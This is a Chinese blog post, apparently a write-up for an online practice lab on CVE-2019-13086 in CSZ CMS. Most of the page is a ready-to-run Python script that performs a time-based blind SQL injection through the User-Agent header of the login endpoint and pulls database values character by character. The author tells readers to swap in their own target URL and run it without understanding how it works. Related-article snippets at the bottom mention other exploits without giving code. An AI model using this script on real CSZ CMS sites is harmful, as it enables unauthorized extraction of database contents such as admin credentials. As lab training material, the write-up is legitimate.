春秋云境 CVE-2019-13086

已于 2024-01-29 13:54:14 修改
阅读量233 收藏 1
点赞数 2
分类专栏: 靶场WP 文章标签: web 安全漏洞 php
于 2024-01-28 15:28:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/135896003
版权

开启靶场
在这里插入图片描述
后台登录位置
ttp://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com/admin/login/check
在这里插入图片描述
POC:

import requests
import time
import threading
import multiprocessing

pool="abcdefghijklmnopqrstuvwsyz1234567890{}-"
mutex=0

#获取长度用的User-Agent模板
ual="'-(if((length((select name from user_admin limit 1))=10),sleep(5),1))-'', '127.0.0.1','time') #"


#"Why don't you just build something"
#----------------------------------------------------获取管理员用户名长度--------------------------------------------
def getlength(field,tbname,total):
    ual_head="'-(if((length((select "     #这些空格一定要保留
    ual_middle=" limit 1))="
    num=1
    ual_last="),sleep(5),1))-'', '127.0.0.1','time') #"

    datas={'email':'111@111.com',
        'password':'111'
    }
    
    header={'Host': 'eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com',
            'Content-Length': '74',
            'Cache-Control': 'max-age=0',
            'Origin': 'http://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com/',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': ual,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Referer': 'http://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com/member/login',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'close'}

    starttime=time.time()
    for num in range(total):
        header['User-Agent']=ual_head+field+" from "+tbname+ual_middle+str(num)+ual_last
        #print(header['User-Agent'])
        sendtime=time.time()
        response=requests.post(r"http://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com/member/login/check/post",data=datas,headers=header)
        recvtime=time.time()

        doesitwork=recvtime-sendtime
        if(doesitwork>5):
            print("The length is",num)
            print("This step cost:",time.time()-starttime)
            return num
            break
        if(num==total-1):
            return 0

#获取内容用的User-Agent模板
ua="'-(if((ascii(substr((select name from user_admin limit 1), 1, 1))=97),sleep(5),1))-'', '127.0.0.1','time') #"
        
#-----------------------------------------------------获取管理员用户名--------------------------------------------
def getcontent(field,tbname,num,qr,lock):

    #print(num)
    pool="abcdefghijklmnopqrstuvwsyz1234567890{}-"
    
    result=[]
    
    ua_head="'-(if((ascii(substr((select "
    ua_front=" limit 1), "
    ua_middle=", 1))="
    char="A"
    ua_last="),sleep(5),1))-'', '127.0.0.1','time') #"

    datas={'email':'111@111.com',
        'password':'111'
    }
    
    header={'Host': 'eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com',
            'Content-Length': '74',
            'Cache-Control': 'max-age=0',
            'Origin': 'http://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': ua,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Referer': 'http://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com/member/login',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'close'}
    
    for i in range(1):
        for char in pool:
            header['User-Agent']=ua_head+field+" from "+tbname+ua_front+str(num+1)+ua_middle+str(ord(char))+ua_last
            #print(header['User-Agent'])
            
            lock.acquire()
            sendtime=time.time()
            response=requests.post(r"http://eci-2ze6bw09oedgb9suy9mv.cloudeci1.ichunqiu.com/member/login/check/post",data=datas,headers=header)
            lock.release()
            
            recvtime=time.time()

            doesitwork=recvtime-sendtime
            if(doesitwork>5):
                #print("It cost:",doesitwork)
                print(num," got:",char)
                #adminnamelist[num]=char    
                result=[num,char]
                qr.put(result)
                break
    
#---------------------------------------------现在!让我们重新揭起救世的大旗!------------------------------------

if __name__=='__main__':

    qr=multiprocessing.Queue()
    lock=multiprocessing.Lock()
    
    field="flag"
    tbname="flag"

    adminname=""
    adminpwd=""

    getresult=[]
    
    #调用获得长度的函数
    length=getlength(field,tbname,100)  
    print("length is",length)

    processes=[]


    #开线程分别对每个字符匹配
    timehead=time.time()

    for ti in range(length):
        processes.append(multiprocessing.Process(target=getcontent,args=(field,tbname,ti,qr,lock)))
        processes[ti].start()

    for ti in range(length):
        processes[ti].join()
        
    fout=open(field+"out.txt","w+")
    for ci in range(length):
        getresult.append(qr.get())
    print(getresult)
    for ci in range(length):
        for result in getresult:
            if(result[0]==ci):
                print(result[1])
                adminname+=result[1]
                
    fout.write(adminname)
    print(field,":",adminname)
    fout.close()
    print("It took:",time.time()-timehead)

替换你的靶场URL,
RUN一下就出来了,不需要思考原理,我也不知道原理。
我们都是脚本小子

关注都点了,别取关了!!!

HMX404
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS 1.2.X版本(2019-06-20之前) ## 三、利用过程 具体见**CVE-2019-13086.py**,利用时替换localhost即可 --- # CSZ CMS 1.2.X 储存型 xss ## 一、漏洞简介 拥有访问私有消息的未授权用户可以向管理面板嵌入Javascript代码。 ## **二、漏洞影响** CSZ CMS 1.2.X ## 三、利用过程
CVE-2019-13396 FlightPath本地文件包含漏洞复现
墙角睡大觉的专栏
07-16 885
FlightPath是一款国外流行的学位管理系统,该学位审核系统旨在帮助确定学位课程的进度,但不是官方成绩单。虽然已尽力确保此系统的准确性,但您应仔细检查并且您的顾问报告任何差异。 FlightPath <4.8.2&<5.0-rc2允许通过index.php?q = system-handle-form-submit POST请求中的form_include参数进行目录遍历和本地文件...
春秋云境 - - Time靶场
qq_44640313的博客
02-27 928
Neo4j Kerberos;Privilege; Elevation;域渗透。Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag。
[SUCTF 2019]Pythonginx(Idna与utf-8编码漏洞)
paidx0
08-28 2227
每天一题,记录学习 题目直接给了源码 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(ur
春秋云境CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
春秋云境CVE-2022-24663复现
小高工作室
11-24 2285
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php。提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。发现是个wp的后台。返回状态码为200表示成功。这里指的是任意PHP代码并且是任意位置。
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
cve-2019-11477.rar
06-20
此漏洞只支持本地检测,不支持远程检测模式,检测成功率很高,可以排查网络资产中是否存在此问题,避免此漏洞造成的DoS 问题
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication [@voidfyoo](https://twitter.com/voidfyoo)
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
Sql语句密码验证漏洞
zgqtxwd的专栏
04-28 938
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
access驱动程序_Windows打印机驱动程序本地提权漏洞分析(CVE201919363)
weixin_39527163的博客
11-26 288
打印机制造商Ricoh已要求Pentagrid协调披露了一个提权漏洞,以缓解影响多种打印机的Windows打印机驱动程序的漏洞。由于在将打印机添加到Windows系统时安装的文件系统条目的文件权限设置不当,因此任何本地用户都可以使用自己的代码覆盖程序库文件(DLL)。0x01 漏洞描述Windows加载了受不当保护的库文件PrintIsolationHost.exe,这是一个以Windo...
cve-2019-07-08
m_de_g的博客
10-04 2169
cve-2019-07-08——RDP漏洞利用 一、影响的系统版本 (1)Window2003 (2)Window2008 (3)Window2008 R2 (4)Window xp (5)Window7 二、测试环境 kali ip:192.168.158.130 靶机ip:192.168.158.139 靶机搭建,请参考我的另一篇博客 https://blog.csdn.net/m_de_g/article/details/119957223?spm=1001.2014.3001.5501 三、思路 1
春秋云境CVE-2022-30887
一只爱吃橙子的羊
11-29 3883
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
sql-labs靶场环境搭建(手把手保姆级教学)
最新发布
administratorlws的博客
05-26 808
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1200
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
【全开源】沃德商协会管理系统源码(FastAdmin+ThinkPHP+Uniapp)
u011092458的博客
05-25 486
一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒,有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场,真正做到为构建有影响力的现代化智慧型组织赋能。数据决策支持:沃德商协会管理系统源码提供的数据统计和分析功能,为商协会提供了宝贵的决策支持,帮助商协会更好地了解市场需求和会员需求,制定更精准的发展战略。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值